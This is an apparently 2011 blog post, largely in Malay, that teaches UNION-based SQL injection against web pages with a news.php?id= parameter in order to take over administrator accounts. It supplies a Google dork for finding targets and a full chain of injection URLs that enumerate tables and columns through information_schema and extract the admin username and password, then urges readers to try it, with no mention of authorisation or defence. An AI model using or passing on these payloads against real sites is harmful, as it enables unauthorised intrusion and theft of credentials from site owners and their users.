Sunday 30 October 2011

Tutorial To Access ADMIN Account For a website


This meth0d called "SQL Injection".
Give it try,Let's Check it 0ut~!
________________________________________________
Sql Injection Tutorial
>>Info<<

Kata kunci yang perlu diketahui
-------------------------------
karakter: ', -
comments: /*, --
-------------------------------
Makluman: "Information_schema" hanya befungsi untuk versi msql versi 5.x

Google Dork yang akan di gunakan ialah "inurl:news.php?id="

Langkah Pertama

[site]/news.php?id=1
---tambahkan karakter ' pada akhir url untuk lihat sama ada site itu vuln untuk
sql injection atau pun tidak.

contoh:

code:

[site]/news.php?id=1'
atau
[site]/news.php?id=-1

contoh error:
warning: mysql_fetch_array(): supplied argument is not a valid MYSQL
result resource in D:\inetpub\wwwroot\ajpower.net\html\news.php on line

Langkah Kedua

Cari jumlah table yang ada di dalam database.
----tambahkan +order+by+1-- diakhir url

Contoh:

Code:
[site]/news.php?id=1+order+by+1--
atau
[site]/news.php?id=1+order+by+1/* periksa secara bepringkat
[site]/news.php?id=1+order+by+2/*
[site]/news.php?id=1+order+by+3/*cari sehingga error keluar

untuk tutorial ini jumlah table yg diperolehi ialah 3.

Langkah Ketiga

Gunakan perintah Union untuk mengeluarkan nombor yang akan kita gunakan kemudian.
-----perintah yang akan digunakan: union+select+1,2,3--

Contoh: angka 2 keluar.

kemudian kita masukkan version() di angka 2,

contoh:

[site]/news.php?id=1+union+select+1,version(),3--

dan paparan version akan tepapar di angka tersebut.
Contoh:
5.1.47-community-log

------
|info|
------

database() = untuk lihat name database yang digunakan
version() = untuk lihat version msql yang digunakan

Langkah Keempat

untuk nampakkan nama2 table yang ada di wenb tersebut, perintah

Table_name ---> letak di angka yang keluar tadi(2)
+from+information_schema.tables-- ---> letak di belakang angka yang terakhir.

contoh:

[site]/news.php?id=1+union+select+1,table_name,3+from+information_schema.tables--

Langkah KeLima

Keluarkan kesemua isi yang ada di dalam table tersebut,

group_concat(table_name) ---> letak di angka yang keluar tadi(2)
+from+information_schema.tables+where+table_schema=database() ---> Masukan selepas angka yang terakhir.

Contoh:

[site]/news.php?id=1+union+select+1,group_concat(table_name),3+from+
information_schema.tables+where+table_schema=database()--

Langkah Ke Enam

Keluar kan kandungan yang ada didalam TABLE

group_concat(column_name) ---> letak di angka yang keluar tadi(2)
+from+information_schema.columns+where+table_name=0xHEXA--
|
|
(LETAK NAMA TABLE YANG SUDAH DI CONVERT KE HEXADECIMEL)

------
|info|
------

Website yang boleh digunakan untuk convert nama table ke hexadecimel ialah
-----> www.piclist.com/techref/ascii.htm
-----> www.centricle.com/tools/ascii-hex/

Column yang akan kita gunakan sebagai contoh ialah table ADMIN
dan hasil convert ialah 41444D494E

Contoh:

[site]/news.php?id=1+union+select+1,group_concat(column_name),3+from+
information_schema.columns+where+table_name=0x41444D494E--

Langkah Ketujuh

Keluarkan hasil isi yang kita berjaya peroleh dari table ADMIN

concat_ws(0x3a,"nama column yang terkandung dlm table ADMIN") ---> letak di angka yang keluar tadi(2)
+from+Admin-- --> asal column

Contoh:

[site]/news.php?id=1+union+select+1,concat_ws(0x3a,id,username,password),3+from+admin--

Dan kita akan peroleh username dan password admin untuk website tersebut.

Langkah Terakhir:

Cari Login untuk admin..

Selamat Mencuba.....

Credit to: Hayate Ayasaki

2 comments: